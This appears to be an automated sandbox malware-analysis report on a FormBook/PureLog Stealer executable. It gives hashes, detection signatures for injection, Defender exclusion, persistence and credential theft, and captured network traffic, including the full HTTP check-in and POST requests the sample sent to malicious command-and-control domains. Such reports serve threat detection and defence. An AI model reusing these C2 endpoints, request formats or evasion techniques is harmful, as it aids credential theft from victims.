Windows Analysis Report
UnmxRI.exe

Overview

General Information

Sample name:	UnmxRI.exe
Analysis ID:	1501599
MD5:	e34c33903020a81f3a09a69c29ade426
SHA1:	864aaa5821e9f3e99da71eff1c8b76bcd1cdea80
SHA256:	c9062d78ee63874928e2d332a8ed0570e99bc06e544e33f002b26f70e0c19510
Tags:	exeformbook
Infos:

Detection

FormBook, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large strings

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://www.theranchobizarro.com/fgkz/	Avira URL Cloud: Label: malware
Source: http://www.sciencebot.sbs/fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTj	Avira URL Cloud: Label: malware
Source: http://www.nexgen-gaming.com/fgkz/	Avira URL Cloud: Label: malware
Source: http://www.sciencebot.sbs/fgkz/	Avira URL Cloud: Label: malware
Source: http://www.theranchobizarro.com/fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTj	Avira URL Cloud: Label: malware
Source: http://www.nexgen-gaming.com/fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ==	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: gpcamservices.com	Virustotal: Detection: 8%	Perma Link
Source: www.sportspaj.com	Virustotal: Detection: 6%	Perma Link
Source: nexgen-gaming.com	Virustotal: Detection: 10%	Perma Link
Source: noobblaster.com	Virustotal: Detection: 8%	Perma Link
Source: www.nathanladd.software	Virustotal: Detection: 6%	Perma Link
Source: www.gpcamservices.com	Virustotal: Detection: 10%	Perma Link
Source: www.pheonix-travels.com	Virustotal: Detection: 6%	Perma Link
Source: www.noobblaster.com	Virustotal: Detection: 6%	Perma Link
Source: http://www.theranchobizarro.com/fgkz/	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: UnmxRI.exe	ReversingLabs: Detection: 65%
Source: UnmxRI.exe	Virustotal: Detection: 68%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 9.2.UnmxRI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.UnmxRI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4497267348.0000000005070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: UnmxRI.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: UnmxRI.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: UnmxRI.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: firefox.pdbP source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: UnmxRI.pdbSHA2561 source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
Source:	Binary string: UnmxRI.pdb source: UnmxRI.exe, tehuvFgZlLZK.exe.0.dr
Source:	Binary string: print.pdbGCTL source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000000.2152182094.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4494232519.0000000000A5E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: UnmxRI.exe, UnmxRI.exe, 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, print.exe, print.exe, 00000010.00000002.4496332350.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, print.exe, 00000010.00000003.2229738198.0000000000995000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2232359944.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000002.4496332350.0000000002E00000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: print.exe, 00000010.00000003.2446027538.0000000007894000.00000004.00000020.00020000.00000000.sdmp, print.exe, 00000010.00000003.2496951415.0000000007944000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: print.pdb source: UnmxRI.exe, 00000009.00000002.2229710026.0000000001418000.00000004.00000020.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 0000000F.00000002.4494941490.00000000014C8000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\print.exe

Code function: 16_2_004BC0B0 FindFirstFileW,FindNextFileW,FindClose,

16_2_004BC0B0

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\print.exe	Code function: 4x nop then pop edi	16_2_004B1870
Source: C:\Windows\SysWOW64\print.exe	Code function: 4x nop then xor eax, eax	16_2_004A98C0
Source: C:\Windows\SysWOW64\print.exe	Code function: 4x nop then pop edi	16_2_004AE137
Source: C:\Windows\SysWOW64\print.exe	Code function: 4x nop then mov ebx, 00000004h	16_2_00BB0531

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49726 -> 52.9.242.57:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49730 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49746 -> 122.10.12.59:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49750 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49717 -> 91.195.240.19:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49734 -> 119.18.54.85:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49742 -> 104.21.92.135:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49758 -> 212.32.237.90:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49722 -> 167.172.228.26:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49762 -> 167.172.228.26:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49738 -> 66.29.154.248:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49754 -> 216.40.34.41:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.heilao9.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 52.9.242.57 52.9.242.57
Source: Joe Sandbox View	IP Address: 212.32.237.90 212.32.237.90

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /fgkz/?4f2t8=qUFBQvWBSx+bgMqyDmLQ5iNb4eTiibWqPMlygN/fc4+dM2Q0fApyvpqDNInFWFQ7PUEWbfd7zdq6gjmLUkGdSLdX5yRbFI8ZXQ==&nFeHa=dbNpTj HTTP/1.1Accept: /Accept-Language: en-usHost: www.pheonix-travels.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ== HTTP/1.1Accept: /Accept-Language: en-usHost: www.nexgen-gaming.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?4f2t8=ry+CYqlVG72iLi2DaEIeXBgMIr7sqRG0JYSJyoRnJC6JbGcr+8VOMaxMsy8Il53Bf6hY6wX/QfSecMpBbFe/nj9vDatoU4SrVQ==&nFeHa=dbNpTj HTTP/1.1Accept: /Accept-Language: en-usHost: www.theranchobizarro.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?4f2t8=Es1t8vCK0sN7XyYvnVVOljQ55acH3Wz1kLP2QzEOa9660+rpR75GQvSkA30bAYbOR2lPGVNfcPr7Ljt/1l/fB9BodoBufVLUjg==&nFeHa=dbNpTj HTTP/1.1Accept: /Accept-Language: en-usHost: www.sciencebot.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=y4FhMh12ATfkFg6tImNw7XoZ6hnl8AB4notnPujEUk+EgZuT0tb2uZJUNE/t4waZuxpptBF/Humi+b09KdNA9iSMBM18JBKWRg== HTTP/1.1Accept: /Accept-Language: en-usHost: www.gpcamservices.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?4f2t8=+meHlBDXvFG0tp5IHuNp5aNfi3jbma4/KPg1jYwxKUxzXvorilFM4RqNjl5oI+tAWQpMLL6Kz03IcJJlzmvukn6IT7E7w1sf4w==&nFeHa=dbNpTj HTTP/1.1Accept: /Accept-Language: en-usHost: www.slimdut.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=jkJyt4aMtNKoYD5sbuFVc9QyaTZ4K2J/yr+l21//H5N/WdfnKajTYLfT/HfxXPoaC4ByuXnDUz3XZuyNEmOuuyoe00P8CgSW4g== HTTP/1.1Accept: /Accept-Language: en-usHost: www.otomain.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?4f2t8=aeeJEj57mUSUfFc8r0lYWf5TLjzOukydlBenCzdgyGJ4dbEC60EhS0rD3xa7pQMeZFPdLFyN09CO6nuGrnlSNGPfsMX8qY9T/A==&nFeHa=dbNpTj HTTP/1.1Accept: /Accept-Language: en-usHost: www.uty803.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?4f2t8=41Curen82hkwcHpyAWCbG1C0h00zKpR4XE7lig5tQUDuQ/w4IAvXl9Gm09xCLibXJ4gYU1q3vSZc7UEZudfqXPaUnSpi+WZhrQ==&nFeHa=dbNpTj HTTP/1.1Accept: /Accept-Language: en-usHost: www.nathanladd.softwareConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?4f2t8=zruAGbX+zzZzwXhsAlQZAULZe4pnPcBNBYGP0N8wJF4ze778247Xmh3iJl2/TqyIQwvJNtjZAjEGWTxWxFAMT6BKV60sGMz7yg==&nFeHa=dbNpTj HTTP/1.1Accept: /Accept-Language: en-usHost: www.hugelmann.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?nFeHa=dbNpTj&4f2t8=WwxZJefTXlbC80/BpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790/Sw0PUDFf+oDAGEaENhNNwIZQ== HTTP/1.1Accept: /Accept-Language: en-usHost: www.sportspaj.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fgkz/?4f2t8=3m5S8RLi2FvoSMlAd2YNW/TJwuNR/4L3lTg0ZykUeQS0d3bBVkf5OCtf3wLO2p5Qie0G5ZQmXW/kTWMxHN/hjFLiWPmpcdZuTA==&nFeHa=dbNpTj HTTP/1.1Accept: /Accept-Language: en-usHost: www.noobblaster.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36

Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: print.exe, 00000010.00000002.4497033740.0000000004990000.00000004.10000000.00040000.00000000.sdmp, print.exe, 00000010.00000002.4498491154.0000000005700000.00000004.00000800.00020000.00000000.sdmp, NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4495670541.0000000004580000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.7789552398763.net
Source: global traffic	DNS traffic detected: DNS query: www.pheonix-travels.com
Source: global traffic	DNS traffic detected: DNS query: www.nexgen-gaming.com
Source: global traffic	DNS traffic detected: DNS query: www.theranchobizarro.com
Source: global traffic	DNS traffic detected: DNS query: www.heilao9.xyz
Source: global traffic	DNS traffic detected: DNS query: www.sciencebot.sbs
Source: global traffic	DNS traffic detected: DNS query: www.gpcamservices.com
Source: global traffic	DNS traffic detected: DNS query: www.slimdut.top
Source: global traffic	DNS traffic detected: DNS query: www.otomain.info
Source: global traffic	DNS traffic detected: DNS query: www.uty803.com
Source: global traffic	DNS traffic detected: DNS query: www.mlfloor.net
Source: global traffic	DNS traffic detected: DNS query: www.nathanladd.software
Source: global traffic	DNS traffic detected: DNS query: www.defengnm.com
Source: global traffic	DNS traffic detected: DNS query: www.hugelmann.org
Source: global traffic	DNS traffic detected: DNS query: www.sportspaj.com
Source: global traffic	DNS traffic detected: DNS query: www.noobblaster.com

Source: unknown

HTTP traffic detected: POST /fgkz/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.nexgen-gaming.comConnection: closeContent-Length: 186Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedOrigin: http://www.nexgen-gaming.comReferer: http://www.nexgen-gaming.com/fgkz/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 34 66 32 74 38 3d 47 33 37 35 42 6e 53 6c 59 64 59 7a 57 62 62 73 37 4e 48 34 43 66 4d 6b 36 6c 75 2f 4d 2b 56 30 54 75 61 6e 33 49 31 54 6c 6f 7a 4c 66 63 65 30 59 75 62 58 6a 6c 43 71 62 76 56 31 64 6f 64 78 59 44 74 62 2b 2b 37 56 2b 78 44 66 32 6a 6b 42 33 2f 44 58 5a 78 79 2f 64 33 33 2b 4f 35 78 58 73 64 6d 43 4b 69 6c 38 69 32 6e 71 33 49 32 75 34 5a 6c 52 4f 6e 75 41 46 69 31 36 66 46 31 36 35 4b 56 58 63 58 73 68 7a 69 33 4f 62 4f 59 4c 6c 76 52 49 57 63 76 4b 69 53 6b 48 70 55 4f 2b 37 2f 67 74 41 43 52 71 75 74 61 6c 51 72 56 75 30 77 3d 3d Data Ascii: 4f2t8=G375BnSlYdYzWbbs7NH4CfMk6lu/M+V0Tuan3I1TlozLfce0YubXjlCqbvV1dodxYDtb++7V+xDf2jkB3/DXZxy/d33+O5xXsdmCKil8i2nq3I2u4ZlROnuAFi16fF165KVXcXshzi3ObOYLlvRIWcvKiSkHpUO+7/gtACRqutalQrVu0w==

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.13.3Content-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privatedate: Fri, 30 Aug 2024 05:19:05 GMTContent-Encoding: gzipData Raw: 61 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d5 5a eb 52 e3 38 16 fe cf 53 9c c9 54 2d b0 63 3b 17 a0 2f 90 b0 93 a6 43 37 b3 40 58 12 7a 76 b6 ab ab 4b b1 15 47 20 5b 6e 49 26 84 e9 7e a0 7d 8d 7d b2 3d 92 2f 71 02 2c 90 b9 54 2d 55 1d db d2 d1 b9 e9 3b 17 d9 dd fe ce 75 3b bf f3 df 1a c0 31 53 9a c5 e1 bf 68 0c 1f a8 54 4c c4 bb b0 ed b5 bc 16 ce 75 53 3d 11 72 17 ba 52 a7 12 de 49 16 32 b1 f6 18 cf e7 fe 81 eb ee af b5 bf 7b db 3f 18 fe 72 d6 83 89 8e 38 3e 17 17 4a 02 e0 24 0e 3b 35 1a d7 f6 51 a7 ec af 1d 51 4d 90 56 27 2e fd 92 b2 eb 4e ed 40 c4 9a c6 da 1d ce 12 5a 03 3f 7b ea d4 34 bd d1 75 c3 6c 0f fc 09 91 8a ea ce c5 f0 d0 7d 95 f3 ca f8 c4 24 a2 9d da 35 a3 d3 44 48 5d 59 3d 65 81 9e 74 02 7a cd 7c ea da 07 07 58 cc 34 23 dc 55 3e e1 b4 d3 74 20 22 37 2c 4a a3 62 c0 6b 38 90 2a 2a ed 33 19 e1 50 2c 16 a4 55 b5 fe a7 7b d1 75 0f 44 94 10 cd 90 b4 22 fa a8 d7 a1 41 48 ef d1 33 52 24 49 38 f3 71 89 88 5d 4d 12 77 c2 c2 09 c7 7f 55 d5 4b a1 a5 cb 34 d3 9c ee 9f 53 c2 a1 a7 34 d1 14 ce a4 48 a8 d4 33 f8 99 8e 60 c0 34 75 e0 e4 78 00 43 91 4a 07 ce 26 42 8b 50 92 64 32 73 e0 03 0b a8 68 d7 33 16 6b 55 6d 02 aa 7c c9 12 a3 4b 45 fa 9b 94 71 0d 63 21 81 84 38 a0 80 c4 01 24 25 47 04 9a f1 9b bc a2 da de 9a 59 a1 71 18 ae 69 1c 08 a9 40 0b 88 28 d5 90 26 76 d2 97 d4 28 9c 14 0a 2b 54 56 79 a8 b7 19 ba 46 e5 16 d5 3d e4 02 45 9f 21 70 72 d5 8b 89 41 af ef 79 5e 6d d1 84 2b 3a 9b 0a 19 a8 8a fe 28 8e 3b 40 ad 9b 9c 52 ac 53 31 61 56 18 80 c1 e3 80 a1 2f c9 6f 19 e7 62 ea c0 94 8e ac 9e 4e e6 84 ec e2 2f 70 a1 72 49 97 84 a1 06 12 39 55 94 31 80 51 bb f5 7a 7a e5 95 d3 9e 2f a2 3a cf 62 f7 b6 0c 8d 8c 53 a1 6e a7 26 c2 5d bb 65 15 66 bf 61 ff 6b 50 2f 94 5d 10 f1 7f 09 81 07 6c 49 25 af d8 d0 7c 88 cc 08 ff 6c 76 ac 42 3c cf a4 76 d5 9d b8 d5 53 a6 d1 56 bb b6 b2 ec c7 ca 2e ce d7 61 b2 87 43 82 79 47 c4 ca 24 48 3b c8 59 7c 85 50 e3 9d 9a 19 af c1 44 d2 71 06 